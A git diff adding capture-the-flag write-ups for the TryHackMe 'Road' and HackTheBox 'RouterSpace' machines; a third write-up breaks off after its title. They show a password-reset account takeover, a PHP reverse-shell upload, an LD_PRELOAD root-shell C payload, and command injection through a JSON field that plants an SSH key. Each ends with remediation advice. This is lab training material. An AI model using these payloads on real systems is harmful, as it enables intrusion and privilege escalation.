https://git-lfs.github.com/spec/v1 +oid sha256:9867ef55f9c6ac150b04bc4b1ec5e9291b9fff8d734b3f99edc0be2d9d318248 +size 14934 diff --git a/content/writeup-ctf/writeup-road-thm/img/image-9.webp b/content/writeup-ctf/writeup-road-thm/img/image-9.webp new file mode 100644 index 0000000..ed1d2ab --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2101accbe72e0d962e84c45f82159086ade0b94a97374bde0f93dea00e6135a +size 5650 diff --git a/content/writeup-ctf/writeup-road-thm/index.md b/content/writeup-ctf/writeup-road-thm/index.md new file mode 100644 index 0000000..8a9660c --- /dev/null +++ b/content/writeup-ctf/writeup-road-thm/index.md @@ -0,0 +1,155 @@ +--- +title: "Writeup - Road (THM)" +date: 2022-04-08 +slug: "writeup-road-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Road](https://tryhackme.com/room/road) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.57.115 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +I start with an enumeration of the files of the website. + +![](img/image-3.webp) + +I find a button on the basic site page that redirects to a login page. We have the possibility to create an account, I start by doing that. + +![](img/image-4.webp) + +Once the account is created, I log in and see the following page: + +![](img/image-5.webp) + +In the `edit profil` section you can't modify anything except the profile picture, but after looking closer, a message indicates that only the admins can do this action... Except that we learn an important information: the email of the admin! + +![](img/image-6.webp) + +After some research on the site, I find another page. This page allows you to change your password. I make a password change and capture the request sent to the server with Burp. + +![](img/image-7.webp) + +I realize that the email of the account is sent during the validation of the form, so I try to send the request but changing my email for the admin one. The server does not return any error, so I can connect to the admin account of the site! + +![](img/image-8.webp) + +Now that I'm admin, I can upload a new profile picture! + +![](img/image-9.webp) + +So I create a PHP reverse shell with the following template: + +[php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellContribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.![](https://github.com/fluidicon.png) + +{{< github repo="pentestmonkey/php-reverse-shell" >}} + +I upload my `reverse.php` file thanks to the profile image change form. No error during the upload, I just have to find where the file has been put on the server.. + +I look at the source code of the page to see if there would not be any information. I find the following comment: + +![](img/image-10.webp) + +So I go to the following address: + + +```bash +10.10.57.115/v2/profileimages/reverse.php +``` +![](img/image-11.webp) + +I now have a reverse shell and can recover the first flag. + + +```bash +$ cat /home/webdeveloper/user.txt +63191e4ece37523c9fe6bb62a5e64d45 +``` +## Privilege escalation + +I start by running [linPeas](https://linpeas.sh). In the result of the command I find that Mysql and MangoDB are running on the machine... + +I upgrade my shell with the following command: + + +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' +``` +Then I try to connect to MySQL without success, so I test with MongoDB : + +![](img/image-12.webp) + +I am now in Mongo, I list the databases with the following command: + +![](img/image-13.webp) + +After a little exploration, I find in the `backup` database a table `user` : + +![](img/image-14.webp) + +I can now connect via SSH to webdeveloper. I then check if this user has SUDO authorization: + +![](img/image-15.webp) + +The `webdeveloper` user can execute the `sky_backup_utility` with root rights. But the most interesting thing is the tag: `env_keep+=LD_PRELOAD`. + +After some research I found this website: + +[Sudo (LD_PRELOAD) (Linux Privilege Escalation) – Touhid’s Blog](https://touhidshaikh.com/blog/2018/04/sudo-ld_preload-linux-privilege-escalation/) + +Overall, it explains that it is possible to execute code before the program and that with root execution rights. So I create a bash.c file with the following content : + + +```C +#include +#include +#include + +void _init() { +unsetenv("LD_PRELOAD"); +setgid(0); +setuid(0); +system("/bin/bash"); +} +``` +bash.cThen I compile it with the following command: + + +```bash +gcc -fPIC -shared -o evil.so evil.c -nostartfiles +``` +I can now run the program with sudo, without forgetting our code that will be executed at the beginning: + + +```bash +sudo LD_PRELOAD=/home/webdeveloper/bash.so sky_backup_utility +``` +![](img/image-16.webp) + +I now have a root shell so I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Secured the password change page to prevent a user from changing the password of a user other than his own +- Set up a verification of the upload files to the server to avoid sending PHP code or other +- Do not store passwords in clear text in a database +- Secure access to databases +- Do not change SETUID bit of a program to avoid `LD_PRELOAD` exploit diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.png b/content/writeup-ctf/writeup-routerspace-htb/featured.png new file mode 100644 index 0000000..1ff5c95 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14c2606653260d2f723ec828c283aeb98a6d834e218ee3815372e24352557785 +size 298015 diff --git a/content/writeup-ctf/writeup-routerspace-htb/featured.webp b/content/writeup-ctf/writeup-routerspace-htb/featured.webp new file mode 100644 index 0000000..a0d4e3d --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ee69a0fd7b5eda7736af887f92317795e8df5aaa52bdf8bd6514620b27a4ba8 +size 27324 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png new file mode 100644 index 0000000..a2d0261 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9128f3872a7b214ec4082218a5249a3f2875741e4e46a64f17cdf599bb0d7d2a +size 32095 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp new file mode 100644 index 0000000..ac2310f --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2ed89955d69df3de816797e2d1c5ac44b7844491a93a0ac9dd3039510fc4fc0 +size 24134 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png new file mode 100644 index 0000000..74d26df --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:232f3e3c57ae61b1109ddc16c66692b3e1fb395b509561753a78ae0f42b47fb0 +size 351037 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp new file mode 100644 index 0000000..7002299 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:306456dbeb2880ee49114b28b0d98e9f5d1a6225ff10d47de454322ed1e038fa +size 64370 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png new file mode 100644 index 0000000..203ee62 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b321b993518d3c4d2eaf1ec1719c1ac235078580156aba3330b54cfb48f18725 +size 40450 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp new file mode 100644 index 0000000..eba97c5 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc032b528eb4c0d34a25ef1e9cf2747bde4a1beb1dad3d6b27d6f153ad6168ef +size 33076 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png new file mode 100644 index 0000000..f837e14 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95386c180e625875e2b7858714242cfb8d2f0d238355cd3360e74dbbc6c47871 +size 35670 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp new file mode 100644 index 0000000..9e774ca --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42a0f23e173b1b214cbf82fabe10982516630a88c995bc4cc9b2678f38ee1766 +size 33494 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png new file mode 100644 index 0000000..bcf1636 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cad33c99df2766d2ced1bd231e3da74c73b9efb7a3f1ad56033fe89c9054f685 +size 37242 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp new file mode 100644 index 0000000..69e9cfd --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5313aa7d3a9bc6a7bad664fb72258ed1f84b872927934e8fc2be32f3d9237d86 +size 35452 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png new file mode 100644 index 0000000..d953858 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a95773c58f7306db639038041c8d6cdf1d01fb4e81488a6bc4df9f7db59e74d5 +size 80746 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp new file mode 100644 index 0000000..9acce79 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd35511688859c2f6b446299c961285f5d510ab2b4b360b88a6ca9db813796f0 +size 53744 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png new file mode 100644 index 0000000..9127602 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03f01d7cea42fa374ef0f666d02fdff7abde117990b115f5545a4e97e77d361e +size 31588 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp new file mode 100644 index 0000000..b26ce74 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af98b4d43dfe66f4296ae1341feb43d30871df57f247af4fe81304c75e5b1f1a +size 27352 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png new file mode 100644 index 0000000..b21c096 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d5435e4c0f8263aa98c9b97701fe719530f626fc2d612f9fd6a5ed6f36c1001 +size 14402 diff --git a/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp new file mode 100644 index 0000000..8916350 --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe6b9937a10d7a9e994ab5852a1b76c902434fb761212be0d5cad2710e8d16ba +size 13938 diff --git a/content/writeup-ctf/writeup-routerspace-htb/index.md b/content/writeup-ctf/writeup-routerspace-htb/index.md new file mode 100644 index 0000000..c8ac46f --- /dev/null +++ b/content/writeup-ctf/writeup-routerspace-htb/index.md @@ -0,0 +1,134 @@ +--- +title: "Writeup - RouterSpace (HTB)" +date: 2022-04-05 +slug: "writeup-routerspace-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [RouterSpace](https://app.hackthebox.com/machines/RouterSpace) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.129.175.15 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port +- 80/tcp : HTTP web server + +Let's go to the site and see if we can find some information. + +![](img/image-2.webp) + +The site presents us with an application to connect our router to "routerspace". In addition to this information we have the possibility to download the application in .apk format. + +## Exploit + +I first tried to analyze the application with [APKtool](https://www.kali.org/tools/apktool/). But I didn't find anything special. So I will try to install it with the help of an emulator. + +After testing several emulation solutions, I finally chose Anbox. To install it on kali I followed the following guide: + +[How to install Anbox on Debian](https://dev.to/sbellone/how-to-install-anbox-on-debian-1hjd) + +After starting Anbox, I start Burp in listening mode on all interfaces, then I set adb with the burp proxy with the following command: + + +```bash +adb shell settings put global http_proxy 192.168.250.1:8080 +``` +I then install the application with the following command: + + +```bash +adb install RouterSpace.apk +``` +After starting the application and testing the connection, I notice that burp is intercepting packets to "". So I add this domain to the "/etc/hosts" file. + +![](img/image-3.webp) + +While analyzing the packet sent by the application I notice a json IP field. + +![](img/image-4.webp) + +By adding ";" I can insert a command that the remote host interprets as a command. Perfect! + +After some tests I realize that I can't launch a reverse shell, possibly there are firewall rules that block. To be confirmed... + +Another solution is to use SSH to get access. I check if there is a '.ssh' folder for the user paul : + +![](img/image-5.webp) + +It exists, so I generate keys: + + +```bash +┌──(kali㉿kali)-[~] +└─$ ssh-keygen +Generating public/private rsa key pair. +Enter file in which to save the key (/home/kali/.ssh/id_rsa): +Enter passphrase (empty for no passphrase): +Enter same passphrase again: +Your identification has been saved in /home/kali/.ssh/id_rsa +Your public key has been saved in /home/kali/.ssh/id_rsa.pub +The key fingerprint is: +SHA256:UbAb/Eaflsqf/Wneee+yy26b+ZymMNXYfXH7oxac8/E kali@kali +The key's randomart image is: ++---[RSA 3072]----+ +| ... | +| . o | +| = . ..| +| * . o+ =| +| S o *o.+o| +| o o.= .o| +| oo +.+| +| .o=+BE| +| +=#&X| ++----[SHA256]-----+ +``` +Then I add my public key in the "authorized\_jeys" file with the following command: + + +```bash +"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys" +``` +I can now connect in SSH and get the first flag. + +![](img/image-6.webp) + +## Privilege escalation + +To start I'll use [linPeas](https://linpeas.sh/) to do a first exploit tracking on the machine. But I have indeed the impression that IPtables rules are blocking my requests: + +![](img/image-7.webp) + +To transfer my file I will use "scp" with the following command: + + +```bash +┌──(kali㉿kali)-[~] +└─$ scp linpeas.sh paul@10.10.11.148:~/ +linpeas.sh 100% 748KB 8.4MB/s 00:00 +``` +After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script which allows to create a root shell: + +[GitHub - mohinparamasivam/Sudo-1.8.31-Root-Exploit: Root shell PoC for CVE-2021-3156Root shell PoC for CVE-2021-3156. Contribute to mohinparamasivam/Sudo-1.8.31-Root-Exploit development by creating an account on GitHub.![](https://github.com/fluidicon.png) + +{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}} + +And indeed after executing the code, I get a root shell and I can recover the last flag! + +![](img/image-8.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Secure the application to avoid code injection +- Run the service with a user who does not have SSH access +- Update the sudo version to a more secure one diff --git a/content/writeup-ctf/writeup-secret-htb/featured.png b/content/writeup-ctf/writeup-secret-htb/featured.png new file mode 100644 index 0000000..590df71 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:999eddadf8957078c856528e1418e1b4b61adb4b3cf1d42af4371297f9218838 +size 260739 diff --git a/content/writeup-ctf/writeup-secret-htb/featured.webp b/content/writeup-ctf/writeup-secret-htb/featured.webp new file mode 100644 index 0000000..8744360 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da839f06f75dff39cc0af1a401c6f2d64dd42a879c272aa59fb307164aff01d +size 25298 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.png b/content/writeup-ctf/writeup-secret-htb/img/image-1.png new file mode 100644 index 0000000..34cc89e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c804133308ad229333445030cb84b8d6931bf69e64daace8ad6885ad0c419c4 +size 56700 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.webp b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp new file mode 100644 index 0000000..5797b13 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea45ff2eca301e6a9c5e4016b1e2751623196b55c14badfebea31dc6461a84c2 +size 47746 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.png b/content/writeup-ctf/writeup-secret-htb/img/image-10.png new file mode 100644 index 0000000..7831efe --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c66741ac71b1471909e2a87a247c0988f25e18a8be20b4a8aebaef783e222994 +size 48565 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.webp b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp new file mode 100644 index 0000000..25116ca --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:124e6754b4192d217eb7320d4d73d09d621cf7bdd0de6b1cd239bf4f34421b5f +size 32370 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.png b/content/writeup-ctf/writeup-secret-htb/img/image-11.png new file mode 100644 index 0000000..5e4fd05 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:184043d432e82c103a8f236ed8635ea63523637d76d7e72208ae29531d0b3621 +size 23449 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.webp b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp new file mode 100644 index 0000000..adbe89a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e07f644154184ca9ef2ca9c192fb3798189dbf7f5828b6838963e7945c4dc86 +size 20576 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.png b/content/writeup-ctf/writeup-secret-htb/img/image-12.png new file mode 100644 index 0000000..7e6e4d6 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82d3de6689942f876b8dff4a07bad0200b92d70e4ca6087a177d82a5433c154e +size 26107 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.webp b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp new file mode 100644 index 0000000..dd0a4c3 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cebbaec44698bd9bb0d95dc2e5c4de9e095b6fe129a50bd0381ffff0e4c10711 +size 21560 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.png b/content/writeup-ctf/writeup-secret-htb/img/image-13.png new file mode 100644 index 0000000..f45d584 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad02150cb49ed0aeff704d9cd64a502486d6680d59d47cbe8eaaa7a13efa0a58 +size 24842 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.webp b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp new file mode 100644 index 0000000..6152394 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08e3d2687ba475f8e0f12dcf50e2f708a33613081a8a515cfb1efd6ad5afe096 +size 20038 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.png b/content/writeup-ctf/writeup-secret-htb/img/image-14.png new file mode 100644 index 0000000..5e9854e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65e5556b139b352bfe7309b02159a955770effebb1adc0be7e6296529a812023 +size 46471 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.webp b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp new file mode 100644 index 0000000..2e8764f --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73c7a6535acdd46e8970ff4834d717077d68225ca0b9214a95798bfb06de2119 +size 35754 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.png b/content/writeup-ctf/writeup-secret-htb/img/image-15.png new file mode 100644 index 0000000..d85e7f9 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a9f097c2a9174a6f75582d11f9bdaa378a8fa7ddf3c19119efea682af484add +size 57864 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.webp b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp new file mode 100644 index 0000000..5e727de --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e213ec4faba2790b72031ed896ecd7d048e21712a500b5aa7722275720f8fbfd +size 60240 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.png b/content/writeup-ctf/writeup-secret-htb/img/image-2.png new file mode 100644 index 0000000..9d6af2f --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbc876ee83e7952cefe17fec1db6e74ddecc36192aefcae12874099ae4c41e15 +size 193060 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.webp b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp new file mode 100644 index 0000000..808cb95 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d14a0a1d66a61ea1faa19c28f2fd505c2d2b6b5645649d7aecd17471c55a2c46 +size 90636 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.png b/content/writeup-ctf/writeup-secret-htb/img/image-3.png new file mode 100644 index 0000000..b270b06 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ecb659f888d7f04405b99d879d2129eb0823b6e24869a9d21ffad89fbc4f4ff +size 44195 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.webp b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp new file mode 100644 index 0000000..c60181b --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb3a5cf87f96fdcd5970efeb89b4143f5015d4b6667ad8faf78356a903ab4daf +size 29508 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.png b/content/writeup-ctf/writeup-secret-htb/img/image-4.png new file mode 100644 index 0000000..441421a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64d1cb86055a36c36d8173704896f0c10b0dfd4130a02ac0f875df9e4cd487da +size 57936 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.webp b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp new file mode 100644 index 0000000..111fb8e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e73ca1bac685d2e7a1426ef7182b8bb0f193479d21b92c2abcd70c41672418 +size 42246 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.png b/content/writeup-ctf/writeup-secret-htb/img/image-5.png new file mode 100644 index 0000000..65c042e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8147764dae8cbdb8f02ab7fbaeaa923f1a1a4b403c701840220e7278251c9eb1 +size 45985 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.webp b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp new file mode 100644 index 0000000..3c4c904 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3104e530458bcd3466f7efdbdee2c9f24b1bb4ba23e61450c4e32158c13d0ed +size 31148 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.png b/content/writeup-ctf/writeup-secret-htb/img/image-6.png new file mode 100644 index 0000000..a37b34b --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48066aaee4ada4758c03cfa174d140749dca25878b56c3a767b09ea339dcfcfb +size 13641 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.webp b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp new file mode 100644 index 0000000..e89c4d7 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cd5613cff5bd8bd0983182fb71e4da99cf52659c690ccab64e47b4e73da621f +size 8850 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.png b/content/writeup-ctf/writeup-secret-htb/img/image-7.png new file mode 100644 index 0000000..eb0b5a4 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0fc620150366ac3db6f506a74ffd012a915c5ab00d7d619f9e6bfebc67680a52 +size 44229 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.webp b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp new file mode 100644 index 0000000..f356ac4 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:834c620884f50558f52028020481739f86745fca9ab835db5d6d2c3ad6b3e89a +size 30614 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.png b/content/writeup-ctf/writeup-secret-htb/img/image-8.png new file mode 100644 index 0000000..7d9d80e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:514011beda714c604b573cdf23003e9abe8e4112e372991787624aa4d83de976 +size 70811 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.webp b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp new file mode 100644 index 0000000..75832a8 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc7eab2fa7e11e7b2b69d1910f2140b51ba271f0110a7ffd86f102762df3862b +size 63426 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.png b/content/writeup-ctf/writeup-secret-htb/img/image-9.png new file mode 100644 index 0000000..6ac5d57 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7cabb82a9e17dabc60e83d1ec4f859943a60525759cebed60fc92cc9d7f4d74 +size 106604 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.webp b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp new file mode 100644 index 0000000..3a3d42a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8858c4d144af986fbed989e7a581b1ff9da572689b637a78544635ce2e2c3af +size 85408 diff --git a/content/writeup-ctf/writeup-secret-htb/index.md b/content/writeup-ctf/writeup-secret-htb/index.md new file mode 100644 index 0000000..3cb7c92 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/index.md @@ -0,0 +1,183 @@ +--- +title: "Writeup - Secret (HTB)" +date: 